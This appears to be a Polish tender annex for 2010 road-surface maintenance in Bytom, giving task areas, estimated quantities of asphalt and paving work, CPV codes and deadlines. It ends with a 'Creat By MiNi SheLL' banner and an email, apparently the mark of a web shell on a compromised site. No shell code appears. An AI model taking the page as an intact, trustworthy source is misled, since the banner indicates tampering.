<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku - II
Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku obejmujące niżej wymienione trzy zadania:
a) Zadanie nr 1 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Górniki, Stolarzowice, Sucha Góra, Miechowice, Karb, Bobrek, Stroszek, Os. Na Wzgórzu;
b) Zadanie nr 2 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Centrum, Rozbark, Łagiewniki, Szombierki.
c) Zadanie nr 3 - bieżące utrzymanie nawierzchni jezdni na drogach krajowych, wojewódzkich i powiatowych.
Podział miasta Bytomia na poszczególne obręby zawiera mapka, stanowiąca załącznik nr 10 do niniejszej specyfikacji. Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia w terenie.

2. Przedmiot zamówienia opisany został szczegółowo w:
a) Przedmiarze Robót,
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót (STWiOR),
c) Założeniach do kalkulacji robót,
d) Wzorze Umowy, które stanowią załączniki do niniejszej specyfikacji.

3. Wykonawca winien udzielić co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty, liczonej od dnia odbioru końcowego potwierdzonego protokołem końcowym.

4. Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:
a/ dla Zadania nr 1 
Lp.	Rodzaj robót	Orientacyjna (szacunkowa) 
ilość robót	Jednostka miary
1	remont cząstkowy nawierzchni bitumicznej	22,00	t
2	mechaniczna rozbiórka nawierzchni bitumicznej grub. 10cm	300,00	m2
3	ręczne ułożenie nawierzchni bitumicznej grub. 5cm  w-wa wiążąca	300,00	m2
4	ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5cm	300,00	m2
5	mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grubości 5cm	1500,00	m2
6	mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grubości 5cm	1500,00	m2
7	cięcie piłą nawierzchni bitumicznej grubości 6-10cm	500,00	m
8	frezowanie nawierzchni bitumicznej grubości 10cm	1000,00	m2
9	wyrównanie nawierzchni masą asfaltową na zimno	0,50	t
10	regulacja pionowa krat ściekowych ulicznych	20,00	szt.
11	regulacja pionowa krat włazów kanałowych	15,00	szt.
12	regulacja pionowa krat studzienek dla zaworów wodociągowych i gazowych mineralno-asfaltową	10,00	szt.
13	remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	5,00	t
14	wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	15,00	t
15	plantowanie poboczy	300,00	m2
16	wypełnienie szczelin w nawierzchni bitumicznej	400,00	m
17	rozebranie i ułożenie krawężnika betonowego 15x30cm z wymianą na nowy na ławie betonowej z oporem	100,00	m
18	mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20cm	200,00	m2
19	mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego)  o grubości w-wy 20cm	200,00	m2
20	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm szarej na podsypce cementowo-piaskowej	200,00	m2
21	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm kolorowej na podsypce cementowo-piaskowej	100,00	m2
22	rozebranie i ułożenie kostki kamiennej rzędowej 14cm do 19cm z odzysku	50,00	m2
23	rozebranie i ułożenie kostki kamiennej nieregularnej do 14cm z odzysku	20,00	m2
24	ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10cm	275,00	m2
Podczas prowadzenia prac w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm).

5. Podane wyżej ilości robót są orientacyjne (szacunkowe),  co oznacza że ich faktyczne ilości mogą odbiegać od założeń, gdyż zlecanie robót odbywać się będzie wg bieżących potrzeb Zamawiającego na podstawie zleceń. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót danego rodzaju i cen jednostkowych podanych w ofercie Wykonawcy, do wysokości łącznej ceny ofertowej wskazanej w formularzu ofertowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku - II
Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmujące niżej wymienione trzy zadania:
a) Zadanie nr 1 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Górniki, Stolarzowice, Sucha Góra, Miechowice, Karb, Bobrek, Stroszek, Os. Na Wzgórzu;
b) Zadanie nr 2 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Centrum, Rozbark, Łagiewniki, Szombierki.
c) Zadanie nr 3 - bieżące utrzymanie nawierzchni jezdni na drogach krajowych, wojewódzkich i powiatowych.
Podział miasta Bytomia na poszczególne obręby zawiera mapka, stanowiąca załącznik nr 10 do niniejszej specyfikacji. Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia w terenie.

2. Przedmiot zamówienia opisany został szczegółowo w:
a) Przedmiarze Robót,
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót (STWiOR),
c) Założeniach do kalkulacji robót,
d) Wzorze Umowy, które stanowią załączniki do niniejszej specyfikacji.

3. Wykonawca winien udzielić co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty, liczonej od dnia odbioru końcowego potwierdzonego protokołem końcowym.

4. Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:
b/ dla Zadania nr 2
Lp.	Rodzaj robót	Orientacyjna (szacunkowa) 
ilość robót	Jednostka miary
1	remont cząstkowy nawierzchni bitumicznej	22,00	t
2	mechaniczna rozbiórka nawierzchni bitumicznej grub. 10cm	300,00	m2
3	ręczne ułożenie nawierzchni bitumicznej grub. 5cm  w-wa wiążąca	300,00	m2
4	ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5cm	300,00	m2
5	mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grubości 5cm	1500,00	m2
6	mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grubości 5cm	1500,00	m2
7	cięcie piłą nawierzchni bitumicznej grubości 6-10cm	500,00	m
8	frezowanie nawierzchni bitumicznej grubości 10cm	1000,00	m2
9	wyrównanie nawierzchni masą asfaltową na zimno	0,50	t
10	regulacja pionowa krat ściekowych ulicznych	20,00	szt.
11	regulacja pionowa krat włazów kanałowych	15,00	szt.
12	regulacja pionowa krat studzienek dla zaworów wodociągowych i gazowych mineralno-asfaltową	10,00	szt.
13	remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	5,00	t
14	wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	15,00	t
15	plantowanie poboczy	300,00	m2
16	wypełnienie szczelin w nawierzchni bitumicznej	400,00	m
17	rozebranie i ułożenie krawężnika betonowego 15x30cm z wymianą na nowy na ławie betonowej z oporem	100,00	m
18	mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20cm	200,00	m2
19	mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego)  o grubości w-wy 20cm	200,00	m2
20	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm szarej na podsypce cementowo-piaskowej	200,00	m2
21	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm kolorowej na podsypce cementowo-piaskowej	100,00	m2
22	rozebranie i ułożenie kostki kamiennej rzędowej 14cm do 19cm z odzysku	50,00	m2
23	rozebranie i ułożenie kostki kamiennej nieregularnej do 14cm z odzysku	20,00	m2
24	ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10cm	275,00	m2
Podczas prowadzenia prac w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm).

5. Podane wyżej ilości robót są orientacyjne (szacunkowe),  co oznacza że ich faktyczne ilości mogą odbiegać od założeń, gdyż zlecanie robót odbywać się będzie wg bieżących potrzeb Zamawiającego na podstawie zleceń. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót danego rodzaju i cen jednostkowych podanych w ofercie Wykonawcy, do wysokości łącznej ceny ofertowej wskazanej w formularzu ofertowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku - II
Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku obejmujące niżej wymienione trzy zadania:
a) Zadanie nr 1 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Górniki, Stolarzowice, Sucha Góra, Miechowice, Karb, Bobrek, Stroszek, Os. Na Wzgórzu;
b) Zadanie nr 2 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Centrum, Rozbark, Łagiewniki, Szombierki.
c) Zadanie nr 3 - bieżące utrzymanie nawierzchni jezdni na drogach krajowych, wojewódzkich i powiatowych.
Podział miasta Bytomia na poszczególne obręby zawiera mapka, stanowiąca załącznik nr 10 do niniejszej specyfikacji. Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia w terenie.

2. Przedmiot zamówienia opisany został szczegółowo w:
a) Przedmiarze Robót,
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót (STWiOR),
c) Założeniach do kalkulacji robót,
d) Wzorze Umowy, które stanowią załączniki do niniejszej specyfikacji.

3. Wykonawca winien udzielić co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty, liczonej od dnia odbioru końcowego potwierdzonego protokołem końcowym.

4. Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:
c/ dla Zadania nr 3
Lp.	Rodzaj robót	Orientacyjna (szacunkowa) 
ilość robót	Jednostka miary
1	remont cząstkowy nawierzchni bitumicznej	50,00	t
2	mechaniczna rozbiórka nawierzchni bitumicznej grub. 10cm	600,00	m2
3	ręczne ułożenie nawierzchni bitumicznej grub. 5cm  w-wa wiążąca	500,00	m2
4	ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5cm	500,00	m2
5	mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grubości 5cm	5000,00	m2
6	mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grubości 5cm	5000,00	m2
7	cięcie piłą nawierzchni bitumicznej grubości 6-10cm	500,00	m
8	frezowanie nawierzchni bitumicznej grubości 10cm	5000,00	m2
9	wyrównanie nawierzchni masą asfaltową na zimno	0,50	t
10	regulacja pionowa krat ściekowych ulicznych	30,00	szt.
11	regulacja pionowa krat włazów kanałowych	50,00	szt.
12	regulacja pionowa krat studzienek dla zaworów wodociągowych i gazowych mineralno-asfaltową	15,00	szt.
13	remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	5,00	t
14	wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	30,00	t
15	plantowanie poboczy	1000,00	m2
16	wypełnienie szczelin w nawierzchni bitumicznej	1000,00	m
17	rozebranie i ułożenie krawężnika betonowego 15x30cm z wymianą na nowy na ławie betonowej z oporem	300,00	m
18	mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20cm	300,00	m2
19	mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego)  o grubości w-wy 20cm	300,00	m2
20	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm szarej na podsypce cementowo-piaskowej	300,00	m2
21	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm kolorowej na podsypce cementowo-piaskowej	100,00	m2
22	rozebranie i ułożenie kostki kamiennej rzędowej 14cm do 19cm z odzysku	50,00	m2
23	rozebranie i ułożenie kostki kamiennej nieregularnej do 14cm z odzysku	20,00	m2
24	ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10cm	275,00	m2
25	Przełożenie kabli i słupów oświetleniowych	53,00	mb
26	Przebudowa kabli energetycznych średniego i niskiego napięcia	154,00	mb
27	Demontaż i montaż kabli teletechnicznych miedzianych	950,00	mb
28	Przebudowa kabli teletechnicznych i światłowodowych	1892,00	mb

Podczas prowadzenia prac w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm).

5. Podane wyżej ilości robót są orientacyjne (szacunkowe),  co oznacza że ich faktyczne ilości mogą odbiegać od założeń, gdyż zlecanie robót odbywać się będzie wg bieżących potrzeb Zamawiającego na podstawie zleceń. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót danego rodzaju i cen jednostkowych podanych w ofercie Wykonawcy, do wysokości łącznej ceny ofertowej wskazanej w formularzu ofertowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com